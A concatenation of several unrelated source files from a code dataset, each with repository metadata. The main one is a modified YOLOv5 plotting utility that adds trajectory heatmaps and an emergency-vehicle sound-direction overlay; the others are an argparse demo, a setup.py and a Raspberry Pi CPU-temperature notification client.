value={"powerState":vm.runtime.powerState}
self._add_data("vm",vm.name,value)
except vmodl.MethodFault as error:
_LOGGER.error( "Connect Vcenter Error : " + error.msg)
return False, error.msg
return True, "ok"
| syjjx/HA_Esxi | ha_vcenter.py | ha_vcenter.py | py | 25,284 | python | en | code | 10 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "homeassistant.components.sensor.PLATFORM_SCHEMA",
"line_number": 62,
"usage_type": "name"
},
{
... |
29568221843 | # -*- coding: utf-8-*-
'''
First script
'''
from pathlib import Path
import sys
import argparse
pathSearch = Path('.').resolve().as_posix()
sys.path.append(pathSearch)
# -----------------------------------------
description='''This is a description of what the script does.
This script:
- is to show how the 'argparse' module works
- displays the given arguments
'''
def parserFunction():
'''Function parsing command line arguments'''
parser = argparse.ArgumentParser(description = description)
# Add arguments to your module: mandatory, i.e. positional and optional i.e.
parser.add_argument('rows', type=int, help=u'''Number of rows''')
parser.add_argument('cols', type=int, help=u'''Number of cols''')
parser.add_argument('-p','--somePath', type=str, help=u'''Path to folder''')
args = parser.parse_args()
return args
def main(args):
if args.somePath:
args.fullPath = Path(args.somePath).resolve().as_posix()
print(f'Dictionary of command line arguments:')
for key,val in vars(args).items():
print(f'key = {key}\tvalues = {val}')
print('\n')
# ------------------------------------------
if __name__ == '__main__':
args = parserFunction()
print(f'''\nThe 'args' is of the type:\t{type(args)}\nand it looks like this:\n\t\t\t{args}\n''')
main(args)
| kemal332/entry | testScript.py | testScript.py | py | 1,390 | python | en | code | null | github-code | 1 | [
{
"api_name": "pathlib.Path",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.path.append",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
... |
20920399171 | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Plotting utils
"""
import math
import os
from copy import copy
from pathlib import Path
import cv2
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sn
import torch
from PIL import Image, ImageDraw, ImageFont
import pdb
from utils.general import (LOGGER, Timeout, check_requirements, clip_coords, increment_path, is_ascii, is_chinese,
try_except, user_config_dir, xywh2xyxy, xyxy2xywh)
from utils.metrics import fitness
import time
# Settings
CONFIG_DIR = user_config_dir() # Ultralytics settings dir
RANK = int(os.getenv('RANK', -1))
matplotlib.rc('font', **{'size': 11})
matplotlib.use('Agg') # for writing to files only
class Colors:
# Ultralytics color palette https://ultralytics.com/
def __init__(self):
# hex = matplotlib.colors.TABLEAU_COLORS.values()
hex = ('FF3838', 'FF9D97', 'FF701F', 'FFB21D', 'CFD231', '48F90A', '92CC17', '3DDB86', '1A9334', '00D4BB',
'2C99A8', '00C2FF', '344593', '6473FF', '0018EC', '8438FF', '520085', 'CB38FF', 'FF95C8', 'FF37C7')
self.palette = [self.hex2rgb('#' + c) for c in hex]
self.n = len(self.palette)
def __call__(self, i, bgr=False):
c = self.palette[int(i) % self.n]
return (c[2], c[1], c[0]) if bgr else c
@staticmethod
def hex2rgb(h): # rgb order (PIL)
return tuple(int(h[1 + i:1 + i + 2], 16) for i in (0, 2, 4))
colors = Colors() # create instance for 'from utils.plots import colors'
def check_font(font='Arial.ttf', size=10):
# Return a PIL TrueType Font, downloading to CONFIG_DIR if necessary
font = Path(font)
font = font if font.exists() else (CONFIG_DIR / font.name)
try:
return ImageFont.truetype(str(font) if font.exists() else font.name, size)
except Exception as e: # download if missing
url = "https://ultralytics.com/assets/" + font.name
print(f'Downloading {url} to {font}...')
torch.hub.download_url_to_file(url, str(font), progress=False)
try:
return ImageFont.truetype(str(font), size)
except TypeError:
check_requirements('Pillow>=8.4.0') # known issue https://github.com/ultralytics/yolov5/issues/5374
class Annotator:
if RANK in (-1, 0):
check_font() # download TTF if necessary
# YOLOv5 Annotator for train/val mosaics and jpgs and detect/hub inference annotations
def __init__(self, im, line_width=None, font_size=None, font='Arial.ttf', pil=False, example='abc'):
assert im.data.contiguous, 'Image not contiguous. Apply np.ascontiguousarray(im) to Annotator() input images.'
self.pil = pil or not is_ascii(example) or is_chinese(example)
if self.pil: # use PIL
self.im = im if isinstance(im, Image.Image) else Image.fromarray(im)
self.draw = ImageDraw.Draw(self.im)
self.font = check_font(font='Arial.Unicode.ttf' if is_chinese(example) else font,
size=font_size or max(round(sum(self.im.size) / 2 * 0.035), 12))
else: # use cv2
self.im = im
self.lw = line_width or max(round(sum(im.shape) / 2 * 0.003), 2) # line width
def box_label(self, box, label='', color=(128, 128, 128), txt_color=(255, 255, 255)):
# Add one xyxy box to image with label
if self.pil or not is_ascii(label):
self.draw.rectangle(box, width=self.lw, outline=color) # box
if label:
w, h = self.font.getsize(label) # text width, height
outside = box[1] - h >= 0 # label fits outside box
self.draw.rectangle([box[0],
box[1] - h if outside else box[1],
box[0] + w + 1,
box[1] + 1 if outside else box[1] + h + 1], fill=color)
# self.draw.text((box[0], box[1]), label, fill=txt_color, font=self.font, anchor='ls') # for PIL>8.0
self.draw.text((box[0], box[1] - h if outside else box[1]), label, fill=txt_color, font=self.font)
else: # cv2
p1, p2 = (int(box[0]), int(box[1])), (int(box[2]), int(box[3]))
cv2.rectangle(self.im, p1, p2, color, thickness=self.lw, lineType=cv2.LINE_AA)
if label:
tf = max(self.lw - 1, 1) # font thickness
w, h = cv2.getTextSize(label, 0, fontScale=self.lw / 3, thickness=tf)[0] # text width, height
outside = p1[1] - h - 3 >= 0 # label fits outside box
p2 = p1[0] + w, p1[1] - h - 3 if outside else p1[1] + h + 3
cv2.rectangle(self.im, p1, p2, color, -1, cv2.LINE_AA) # filled
cv2.putText(self.im, label, (p1[0], p1[1] - 2 if outside else p1[1] + h + 2), 0, self.lw / 3, txt_color,
thickness=tf, lineType=cv2.LINE_AA)
def rectangle(self, xy, fill=None, outline=None, width=1):
# Add rectangle to image (PIL-only)
self.draw.rectangle(xy, fill, outline, width)
def text(self, xy, text, txt_color=(255, 255, 255)):
# Add text to image (PIL-only)
w, h = self.font.getsize(text) # text width, height
self.draw.text((xy[0], xy[1] - h + 1), text, fill=txt_color, font=self.font)
def result(self):
# Return annotated image as array
return np.asarray(self.im)
##### Trajectory code #####
def draw_grtr(self, img, positions, width):
for t in range(len(positions) - 1):
cv2.line(img, (round(positions[t][0]), round(positions[t][1])), \
(round(positions[t + 1][0]), round(positions[t + 1][1])), \
color=(255,255,255), thickness=width, lineType=cv2.LINE_AA)
def draw_trajectory(self, diverse_traj_data, blur_size, dets, frame_id, color):
### Ask ###
# draw_start = time.time()
w = dets[:, 2] - dets[:, 0]
h = dets[:, 3] - dets[:, 1]
cxs = dets[:, 0] + (w//2)
y2s = dets[:, 1] + h #
########
traj_mask = np.zeros((self.im.shape[0], self.im.shape[1], 3))
# line_mask = np.zeros((npy_line.shape[0], npy_line.shape[1], 3))
line_mask = np.zeros((self.im.shape[0], self.im.shape[1], 3))
final = None
bot_max = -1
for l in range(len(cxs)):
cx = cxs[l]
y2 = y2s[l]
# if cx >= npy_line.shape[1]:
# cx = npy_line.shape[1] - 1
# if y2 > npy_line.shape[0]:
# y2 = npy_line.shape[0] - 1
if cx >= self.im.shape[1]:
cx = self.im.shape[1] - 1
if y2 > self.im.shape[0]:
y2 = self.im.shape[0] - 1
# draw_fin = time.time()
# print("draw cost: ")
if frame_id in diverse_traj_data.keys():
frame_data = diverse_traj_data[frame_id] # n_samples, num_id, timestep, coordinate (20, 2, 25, 4)
traj_layers = np.zeros((20, self.im.shape[0], self.im.shape[1]), np.uint8)
for i, sample in enumerate(frame_data): # i: sample_id, sample: different_traj in a frame
routes = None
for agent_data in sample:
route = agent_data[:, 2:4]
self.draw_grtr(traj_layers[i], route, 15)
heatmap_layer = np.sum(traj_layers, axis=0).astype(np.uint8)
heatmap_layer = cv2.blur(heatmap_layer, (blur_size, blur_size))
heat = heatmap_layer.copy()
heat[heat>0] = 255
traj_mask[heat==255] = color
index_y, index_x = np.where(heat == 255)[0], np.where(heat == 255)[1]
tra_max = -1
for iy, ix in zip(index_y, index_x):
# if line_mask[iy, ix, 1] == 255 and line_mask[iy, ix, 2] == 0 and iy > tra_max:
if iy > tra_max: # Add new line
tra_max = iy
if tra_max >= 0:
#line_mask[npy_line==1] = (0,255,0)
line_mask[:tra_max, :, [1, 2]] = line_mask[:tra_max, :, [2, 1]]
else:
line_mask = line_mask
heat_gray = cv2.cvtColor(traj_mask.astype(np.uint8), cv2.COLOR_BGR2GRAY)
cnts, hierarchy = cv2.findContours(heat_gray.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
heatmap_layer = cv2.applyColorMap(heatmap_layer, cv2.COLORMAP_HOT)
final_1 = cv2.addWeighted(line_mask.astype(np.uint8), 1, self.im, 1, 0)
final_2 = cv2.addWeighted(traj_mask.astype(np.uint8), 1, self.im, 1, 0)
final = cv2.addWeighted(final_1, 0.5, final_2, 0.5, 0)
cv2.drawContours(final, cnts, -1, (0, 0, 0), 1, lineType=cv2.LINE_AA)
else:
final = cv2.addWeighted(line_mask.astype(np.uint8), 1, self.im, 1, 0)
#final_2 = image
heat = np.zeros((self.im.shape[0], self.im.shape[1]))
#final = cv2.resize(final, (0,0), fx = 0.5, fy = 0.5)
self.im = final
###########
##### Sound Signal code #####
def addTogether(self, car,x,y, type='icon'): # img為背景圖 ,car為車子圖 , x,y為圖像在背景的位置
rows,cols,channels = car.shape #拆分圖片信息
#轉換格式
img_hsv = cv2.cvtColor(car,cv2.COLOR_RGB2HSV) #把圖片轉換成HSV格式,用於摳圖
#摳圖
lower_blue=np.array([0,0,0]) #獲取最小閾值
#upper_blue=np.array([0,255,255]) #獲取最大閾值
upper_color = np.array([0,0,0])
if type == 'car':
upper_color = np.array([0,255,255])
else:
upper_color = np.array([255,0,0])
mask = cv2.inRange(img_hsv, lower_blue, upper_color) #創建遮罩
erode=cv2.erode(mask,None,iterations=3) #圖像腐蝕
dilate=cv2.dilate(erode,None,iterations=1) #圖像膨脹
opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (8,8))) #開運算
#========圖像合併==========================================================================================
center = [y,x] #設置car在背景圖的起始位置
for i in range(rows):
for j in range(cols):
if opening[i,j]==0: #代表黑色
self.im[center[0]+i,center[1]+j] =car[i,j] #賦值顏色
def sound_signal(self, data): # Add signal
#導入車子圖
#global tmp # Take the global var tmp
car = cv2.imread('/home/ziyan/Yolov5_DeepSort_Pytorch_ros/Yolov5_DeepSort_Pytorch/icon_imgs/car.png') #car圖片導入
car = cv2.resize(car,(0,0),fx=0.4,fy=0.4) # 0.15, 0.15
#導入ambulance
amb = cv2.imread('/home/ziyan/Yolov5_DeepSort_Pytorch_ros/Yolov5_DeepSort_Pytorch/icon_imgs/type_icon/amb.png') #ambulance圖片導入
#pdb.set_trace()
amb = cv2.resize(amb,(0,0),fx=1.2,fy=1.2)
#pdb.set_trace()
fire = cv2.imread('/home/ziyan/Yolov5_DeepSort_Pytorch_ros/Yolov5_DeepSort_Pytorch/icon_imgs/type_icon/fire.png') #ambulance圖片導入
#pdb.set_trace()
fire = cv2.resize(amb,(0,0),fx=1.2,fy=1.2)
police = cv2.imread('/home/ziyan/Yolov5_DeepSort_Pytorch_ros/Yolov5_DeepSort_Pytorch/icon_imgs/type_icon/police.png') #ambulance圖片導入
#pdb.set_trace()
police = cv2.resize(amb,(0,0),fx=1.2,fy=1.2)
#================初始化座標值=====================
x = int(0.1*self.im.shape[1]) #圓的x座標 圖片的寬的倍數 shape=(length,width,channel)
y = int(0.8*self.im.shape[0]) #圓的y座標
r =int(0.15*self.im.shape[0]) #圓的半徑
#================畫出圓形=====================
cv2.circle(self.im,(x,y),r,(84,46,8),-1)
m = 3 #畫m個同心圓
r_circle = r/m
for i in range(1,m+1):
cv2.circle(self.im,(x,y),int(r_circle*i),(255,255,255),1)
#================畫出直線=====================
#每45度畫一條線
#直線點座標(x_line,y_line)
n = 12 #畫出n等份的圓
degree_line = 360/n #每 degree_line度 就畫線
#print("degree_line:"+str(degree_line))
for i in range(n):
theta_line = ((i*degree_line)/180)*math.pi #角度轉成弧度
x_line = int(x + r*math.cos(theta_line))
y_line = int(y - r*math.sin(theta_line))
cv2.line(self.im,(x,y),(x_line,y_line),(250,255,255),1)
#===========================================
#方位角 角度為n等份的範圍值 (畫扇形:橢圓的長軸與短軸=圓形半徑)
angle, label_type = data.split(',')
label_list = [2,3,4]
if label_type in label_list:
### Select a specific signal
p = (12 - angle // 30) % 12 # 330->11->1, 30->1->11
#p = 7 # 7*30
#p = np.random.randint(0,n) #隨機挑選第n等份的某值 -> Also, the pic being select is not in the correct order (Double random)
#print("p:"+str(p))
degree_elli_start = p * degree_line # degree_line=360/n #起始角度
degree_elli_end = (p+1) * degree_line #終止角度
# #橢圓(圖片名稱,中心點,(長軸,短軸),旋轉角度(順時針方向),繪製的起始角度(順時針方向),繪製的終止角度(順時針方向),線條顏色,線條粗細)
cv2.ellipse(self.im,(x,y),(r,r),0,-degree_elli_start,-degree_elli_end,(0,215,255),-1)
# x,y
self.addTogether(car, x - car.shape[1]//2, y - car.shape[0]//2, type='car')
if label_type == 2: # police
self.addTogether(police, 2*x,y - police.shape[0]//2)
elif label_type == 3: # fire
self.addTogether(fire, 2*x,y - fire.shape[0]//2)
elif label_type == 4: # amb
self.addTogether(amb, 2*x,y - amb.shape[0]//2)
#return draw_img
###########
def feature_visualization(x, module_type, stage, n=32, save_dir=Path('runs/detect/exp')):
"""
x: Features to be visualized
module_type: Module type
stage: Module stage within model
n: Maximum number of feature maps to plot
save_dir: Directory to save results
"""
if 'Detect' not in module_type:
batch, channels, height, width = x.shape # batch, channels, height, width
if height > 1 and width > 1:
f = save_dir / f"stage{stage}_{module_type.split('.')[-1]}_features.png" # filename
blocks = torch.chunk(x[0].cpu(), channels, dim=0) # select batch index 0, block by channels
n = min(n, channels) # number of plots
fig, ax = plt.subplots(math.ceil(n / 8), 8, tight_layout=True) # 8 rows x n/8 cols
ax = ax.ravel()
plt.subplots_adjust(wspace=0.05, hspace=0.05)
for i in range(n):
ax[i].imshow(blocks[i].squeeze()) # cmap='gray'
ax[i].axis('off')
print(f'Saving {f}... ({n}/{channels})')
plt.savefig(f, dpi=300, bbox_inches='tight')
plt.close()
np.save(str(f.with_suffix('.npy')), x[0].cpu().numpy()) # npy save
def hist2d(x, y, n=100):
# 2d histogram used in labels.png and evolve.png
xedges, yedges = np.linspace(x.min(), x.max(), n), np.linspace(y.min(), y.max(), n)
hist, xedges, yedges = np.histogram2d(x, y, (xedges, yedges))
xidx = np.clip(np.digitize(x, xedges) - 1, 0, hist.shape[0] - 1)
yidx = np.clip(np.digitize(y, yedges) - 1, 0, hist.shape[1] - 1)
return np.log(hist[xidx, yidx])
def butter_lowpass_filtfilt(data, cutoff=1500, fs=50000, order=5):
from scipy.signal import butter, filtfilt
# https://stackoverflow.com/questions/28536191/how-to-filter-smooth-with-scipy-numpy
def butter_lowpass(cutoff, fs, order):
nyq = 0.5 * fs
normal_cutoff = cutoff / nyq
return butter(order, normal_cutoff, btype='low', analog=False)
b, a = butter_lowpass(cutoff, fs, order=order)
return filtfilt(b, a, data) # forward-backward filter
def output_to_target(output):
# Convert model output to target format [batch_id, class_id, x, y, w, h, conf]
targets = []
for i, o in enumerate(output):
for *box, conf, cls in o.cpu().numpy():
targets.append([i, cls, *list(*xyxy2xywh(np.array(box)[None])), conf])
return np.array(targets)
def plot_images(images, targets, paths=None, fname='images.jpg', names=None, max_size=1920, max_subplots=16):
# Plot image grid with labels
if isinstance(images, torch.Tensor):
images = images.cpu().float().numpy()
if isinstance(targets, torch.Tensor):
targets = targets.cpu().numpy()
if np.max(images[0]) <= 1:
images *= 255 # de-normalise (optional)
bs, _, h, w = images.shape # batch size, _, height, width
bs = min(bs, max_subplots) # limit plot images
ns = np.ceil(bs ** 0.5) # number of subplots (square)
# Build Image
mosaic = np.full((int(ns * h), int(ns * w), 3), 255, dtype=np.uint8) # init
for i, im in enumerate(images):
if i == max_subplots: # if last batch has fewer images than we expect
break
x, y = int(w * (i // ns)), int(h * (i % ns)) # block origin
im = im.transpose(1, 2, 0)
mosaic[y:y + h, x:x + w, :] = im
# Resize (optional)
scale = max_size / ns / max(h, w)
if scale < 1:
h = math.ceil(scale * h)
w = math.ceil(scale * w)
mosaic = cv2.resize(mosaic, tuple(int(x * ns) for x in (w, h)))
# Annotate
fs = int((h + w) * ns * 0.01) # font size
annotator = Annotator(mosaic, line_width=round(fs / 10), font_size=fs, pil=True)
for i in range(i + 1):
x, y = int(w * (i // ns)), int(h * (i % ns)) # block origin
annotator.rectangle([x, y, x + w, y + h], None, (255, 255, 255), width=2) # borders
if paths:
annotator.text((x + 5, y + 5 + h), text=Path(paths[i]).name[:40], txt_color=(220, 220, 220)) # filenames
if len(targets) > 0:
ti = targets[targets[:, 0] == i] # image targets
boxes = xywh2xyxy(ti[:, 2:6]).T
classes = ti[:, 1].astype('int')
labels = ti.shape[1] == 6 # labels if no conf column
conf = None if labels else ti[:, 6] # check for confidence presence (label vs pred)
if boxes.shape[1]:
if boxes.max() <= 1.01: # if normalized with tolerance 0.01
boxes[[0, 2]] *= w # scale to pixels
boxes[[1, 3]] *= h
elif scale < 1: # absolute coords need scale if image scales
boxes *= scale
boxes[[0, 2]] += x
boxes[[1, 3]] += y
for j, box in enumerate(boxes.T.tolist()):
cls = classes[j]
color = colors(cls)
cls = names[cls] if names else cls
if labels or conf[j] > 0.25: # 0.25 conf thresh
label = f'{cls}' if labels else f'{cls} {conf[j]:.1f}'
annotator.box_label(box, label, color=color)
annotator.im.save(fname) # save
def plot_lr_scheduler(optimizer, scheduler, epochs=300, save_dir=''):
# Plot LR simulating training for full epochs
optimizer, scheduler = copy(optimizer), copy(scheduler) # do not modify originals
y = []
for _ in range(epochs):
scheduler.step()
y.append(optimizer.param_groups[0]['lr'])
plt.plot(y, '.-', label='LR')
plt.xlabel('epoch')
plt.ylabel('LR')
plt.grid()
plt.xlim(0, epochs)
plt.ylim(0)
plt.savefig(Path(save_dir) / 'LR.png', dpi=200)
plt.close()
def plot_val_txt(): # from utils.plots import *; plot_val()
# Plot val.txt histograms
x = np.loadtxt('val.txt', dtype=np.float32)
box = xyxy2xywh(x[:, :4])
cx, cy = box[:, 0], box[:, 1]
fig, ax = plt.subplots(1, 1, figsize=(6, 6), tight_layout=True)
ax.hist2d(cx, cy, bins=600, cmax=10, cmin=0)
ax.set_aspect('equal')
plt.savefig('hist2d.png', dpi=300)
fig, ax = plt.subplots(1, 2, figsize=(12, 6), tight_layout=True)
ax[0].hist(cx, bins=600)
ax[1].hist(cy, bins=600)
plt.savefig('hist1d.png', dpi=200)
def plot_targets_txt(): # from utils.plots import *; plot_targets_txt()
# Plot targets.txt histograms
x = np.loadtxt('targets.txt', dtype=np.float32).T
s = ['x targets', 'y targets', 'width targets', 'height targets']
fig, ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)
ax = ax.ravel()
for i in range(4):
ax[i].hist(x[i], bins=100, label=f'{x[i].mean():.3g} +/- {x[i].std():.3g}')
ax[i].legend()
ax[i].set_title(s[i])
plt.savefig('targets.jpg', dpi=200)
def plot_val_study(file='', dir='', x=None): # from utils.plots import *; plot_val_study()
# Plot file=study.txt generated by val.py (or plot all study*.txt in dir)
save_dir = Path(file).parent if file else Path(dir)
plot2 = False # plot additional results
if plot2:
ax = plt.subplots(2, 4, figsize=(10, 6), tight_layout=True)[1].ravel()
fig2, ax2 = plt.subplots(1, 1, figsize=(8, 4), tight_layout=True)
# for f in [save_dir / f'study_coco_{x}.txt' for x in ['yolov5n6', 'yolov5s6', 'yolov5m6', 'yolov5l6', 'yolov5x6']]:
for f in sorted(save_dir.glob('study*.txt')):
y = np.loadtxt(f, dtype=np.float32, usecols=[0, 1, 2, 3, 7, 8, 9], ndmin=2).T
x = np.arange(y.shape[1]) if x is None else np.array(x)
if plot2:
s = ['P', 'R', 'mAP@.5', 'mAP@.5:.95', 't_preprocess (ms/img)', 't_inference (ms/img)', 't_NMS (ms/img)']
for i in range(7):
ax[i].plot(x, y[i], '.-', linewidth=2, markersize=8)
ax[i].set_title(s[i])
j = y[3].argmax() + 1
ax2.plot(y[5, 1:j], y[3, 1:j] * 1E2, '.-', linewidth=2, markersize=8,
label=f.stem.replace('study_coco_', '').replace('yolo', 'YOLO'))
ax2.plot(1E3 / np.array([209, 140, 97, 58, 35, 18]), [34.6, 40.5, 43.0, 47.5, 49.7, 51.5],
'k.-', linewidth=2, markersize=8, alpha=.25, label='EfficientDet')
ax2.grid(alpha=0.2)
ax2.set_yticks(np.arange(20, 60, 5))
ax2.set_xlim(0, 57)
ax2.set_ylim(25, 55)
ax2.set_xlabel('GPU Speed (ms/img)')
ax2.set_ylabel('COCO AP val')
ax2.legend(loc='lower right')
f = save_dir / 'study.png'
print(f'Saving {f}...')
plt.savefig(f, dpi=300)
@try_except # known issue https://github.com/ultralytics/yolov5/issues/5395
@Timeout(30) # known issue https://github.com/ultralytics/yolov5/issues/5611
def plot_labels(labels, names=(), save_dir=Path('')):
# plot dataset labels
LOGGER.info(f"Plotting labels to {save_dir / 'labels.jpg'}... ")
c, b = labels[:, 0], labels[:, 1:].transpose() # classes, boxes
nc = int(c.max() + 1) # number of classes
x = pd.DataFrame(b.transpose(), columns=['x', 'y', 'width', 'height'])
# seaborn correlogram
sn.pairplot(x, corner=True, diag_kind='auto', kind='hist', diag_kws=dict(bins=50), plot_kws=dict(pmax=0.9))
plt.savefig(save_dir / 'labels_correlogram.jpg', dpi=200)
plt.close()
# matplotlib labels
matplotlib.use('svg') # faster
ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)[1].ravel()
y = ax[0].hist(c, bins=np.linspace(0, nc, nc + 1) - 0.5, rwidth=0.8)
# [y[2].patches[i].set_color([x / 255 for x in colors(i)]) for i in range(nc)] # update colors bug #3195
ax[0].set_ylabel('instances')
if 0 < len(names) < 30:
ax[0].set_xticks(range(len(names)))
ax[0].set_xticklabels(names, rotation=90, fontsize=10)
else:
ax[0].set_xlabel('classes')
sn.histplot(x, x='x', y='y', ax=ax[2], bins=50, pmax=0.9)
sn.histplot(x, x='width', y='height', ax=ax[3], bins=50, pmax=0.9)
# rectangles
labels[:, 1:3] = 0.5 # center
labels[:, 1:] = xywh2xyxy(labels[:, 1:]) * 2000
img = Image.fromarray(np.ones((2000, 2000, 3), dtype=np.uint8) * 255)
for cls, *box in labels[:1000]:
ImageDraw.Draw(img).rectangle(box, width=1, outline=colors(cls)) # plot
ax[1].imshow(img)
ax[1].axis('off')
for a in [0, 1, 2, 3]:
for s in ['top', 'right', 'left', 'bottom']:
ax[a].spines[s].set_visible(False)
plt.savefig(save_dir / 'labels.jpg', dpi=200)
matplotlib.use('Agg')
plt.close()
def plot_evolve(evolve_csv='path/to/evolve.csv'): # from utils.plots import *; plot_evolve()
# Plot evolve.csv hyp evolution results
evolve_csv = Path(evolve_csv)
data = pd.read_csv(evolve_csv)
keys = [x.strip() for x in data.columns]
x = data.values
f = fitness(x)
j = np.argmax(f) # max fitness index
plt.figure(figsize=(10, 12), tight_layout=True)
matplotlib.rc('font', **{'size': 8})
for i, k in enumerate(keys[7:]):
v = x[:, 7 + i]
mu = v[j] # best single result
plt.subplot(6, 5, i + 1)
plt.scatter(v, f, c=hist2d(v, f, 20), cmap='viridis', alpha=.8, edgecolors='none')
plt.plot(mu, f.max(), 'k+', markersize=15)
plt.title(f'{k} = {mu:.3g}', fontdict={'size': 9}) # limit to 40 characters
if i % 5 != 0:
plt.yticks([])
print(f'{k:>15}: {mu:.3g}')
f = evolve_csv.with_suffix('.png') # filename
plt.savefig(f, dpi=200)
plt.close()
print(f'Saved {f}')
def plot_results(file='path/to/results.csv', dir=''):
# Plot training results.csv. Usage: from utils.plots import *; plot_results('path/to/results.csv')
save_dir = Path(file).parent if file else Path(dir)
fig, ax = plt.subplots(2, 5, figsize=(12, 6), tight_layout=True)
ax = ax.ravel()
files = list(save_dir.glob('results*.csv'))
assert len(files), f'No results.csv files found in {save_dir.resolve()}, nothing to plot.'
for fi, f in enumerate(files):
try:
data = pd.read_csv(f)
s = [x.strip() for x in data.columns]
x = data.values[:, 0]
for i, j in enumerate([1, 2, 3, 4, 5, 8, 9, 10, 6, 7]):
y = data.values[:, j]
# y[y == 0] = np.nan # don't show zero values
ax[i].plot(x, y, marker='.', label=f.stem, linewidth=2, markersize=8)
ax[i].set_title(s[j], fontsize=12)
# if j in [8, 9, 10]: # share train and val loss y axes
# ax[i].get_shared_y_axes().join(ax[i], ax[i - 5])
except Exception as e:
print(f'Warning: Plotting error for {f}: {e}')
ax[1].legend()
fig.savefig(save_dir / 'results.png', dpi=200)
plt.close()
def profile_idetection(start=0, stop=0, labels=(), save_dir=''):
# Plot iDetection '*.txt' per-image logs. from utils.plots import *; profile_idetection()
ax = plt.subplots(2, 4, figsize=(12, 6), tight_layout=True)[1].ravel()
s = ['Images', 'Free Storage (GB)', 'RAM Usage (GB)', 'Battery', 'dt_raw (ms)', 'dt_smooth (ms)', 'real-world FPS']
files = list(Path(save_dir).glob('frames*.txt'))
for fi, f in enumerate(files):
try:
results = np.loadtxt(f, ndmin=2).T[:, 90:-30] # clip first and last rows
n = results.shape[1] # number of rows
x = np.arange(start, min(stop, n) if stop else n)
results = results[:, x]
t = (results[0] - results[0].min()) # set t0=0s
results[0] = x
for i, a in enumerate(ax):
if i < len(results):
label = labels[fi] if len(labels) else f.stem.replace('frames_', '')
a.plot(t, results[i], marker='.', label=label, linewidth=1, markersize=5)
a.set_title(s[i])
a.set_xlabel('time (s)')
# if fi == len(files) - 1:
# a.set_ylim(bottom=0)
for side in ['top', 'right']:
a.spines[side].set_visible(False)
else:
a.remove()
except Exception as e:
print(f'Warning: Plotting error for {f}; {e}')
ax[1].legend()
plt.savefig(Path(save_dir) / 'idetection_profile.png', dpi=200)
def save_one_box(xyxy, im, file='image.jpg', gain=1.02, pad=10, square=False, BGR=False, save=True):
# Save image crop as {file} with crop size multiple {gain} and {pad} pixels. Save and/or return crop
xyxy = torch.tensor(xyxy).view(-1, 4)
b = xyxy2xywh(xyxy) # boxes
if square:
b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # attempt rectangle to square
b[:, 2:] = b[:, 2:] * gain + pad # box wh * gain + pad
xyxy = xywh2xyxy(b).long()
clip_coords(xyxy, im.shape)
crop = im[int(xyxy[0, 1]):int(xyxy[0, 3]), int(xyxy[0, 0]):int(xyxy[0, 2]), ::(1 if BGR else -1)]
if save:
file.parent.mkdir(parents=True, exist_ok=True) # make directory
cv2.imwrite(str(increment_path(file).with_suffix('.jpg')), crop)
return crop
| ziyan0302/Yolov5_DeepSort_Pytorch_ros | Yolov5_DeepSort_Pytorch/yolov5/utils/plots.py | plots.py | py | 29,223 | python | en | code | 5 | github-code | 1 | [
{
"api_name": "utils.general.user_config_dir",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "matplotlib.rc",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "matplotlib.use"... |
23829749926 | try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup
config = {
'description': 'SNAPS OpenStack Installer',
'author': 'Steve Pisarski',
'url': 'https://github.com/cablelabs/snaps-openstack',
'download_url': 'https://github.com/cablelabs/snaps-openstack/archive/master.zip',
'author_email': 's.pisarski@cablelabs.com',
'version': '1.0',
'packages': find_packages(),
'install_requires': ['ansible==2.7.10',
'pathlib',
'six',
'pyyaml'],
'scripts': [],
'name': 'snaps-openstack'
}
setup(**config)
| cablelabs/snaps-openstack | setup.py | setup.py | py | 667 | python | en | code | 9 | github-code | 1 | [
{
"api_name": "setuptools.find_packages",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "distutils.core.setup",
"line_number": 22,
"usage_type": "call"
}
] |
4046943676 | import os
import threading
import common.Api_pb2 as oap_api
from common.Client import Client, ClientEventHandler
from gpiozero import CPUTemperature
# Define cpu threshold (*C)
CPU_THRESHOLD = 60
cpu = CPUTemperature()
class EventHandler(ClientEventHandler):
def __init__(self):
self._notification_channel_id = None
self._timer = None
def on_hello_response(self, client, message):
print((f"received hello response, result: {message.result}," +
f"oap version: {message.oap_version.major}.{message.oap_version.minor}," +
f"api version: {message.api_version.major}.{message.api_version.minor}")
)
register_notification_channel_request = oap_api.RegisterNotificationChannelRequest(
)
register_notification_channel_request.name = "Power Management Notification Channel"
register_notification_channel_request.description = (
"Notification channel for power management alerts"
)
client.send(oap_api.MESSAGE_REGISTER_NOTIFICATION_CHANNEL_REQUEST, 0,
register_notification_channel_request.SerializeToString())
def on_register_notification_channel_response(self, client, message):
print(
(f"register notification channel response, result: {message.result}," +
f"icon id: {message.id}")
)
self._notification_channel_id = message.id
if message.result == (
oap_api.RegisterNotificationChannelResponse.REGISTER_NOTIFICATION_CHANNEL_RESULT_OK
):
print("notification channel successfully registered")
self.show_notification(client)
def show_notification(self, client):
cpu_temperature = cpu.temperature
if cpu_temperature > CPU_THRESHOLD:
cpu_temp_format = str(round(cpu_temperature,1))+'\N{DEGREE SIGN}'+'C'
print("sending notification")
show_notification = oap_api.ShowNotification()
show_notification.channel_id = self._notification_channel_id
show_notification.title = "CPU Temperature Alert"
show_notification.description = "CPU temperature is "+cpu_temp_format
show_notification.single_line = "CPU Temp - "+cpu_temp_format
with open("assets/notification_icon.svg", 'rb') as icon_file:
show_notification.icon = icon_file.read()
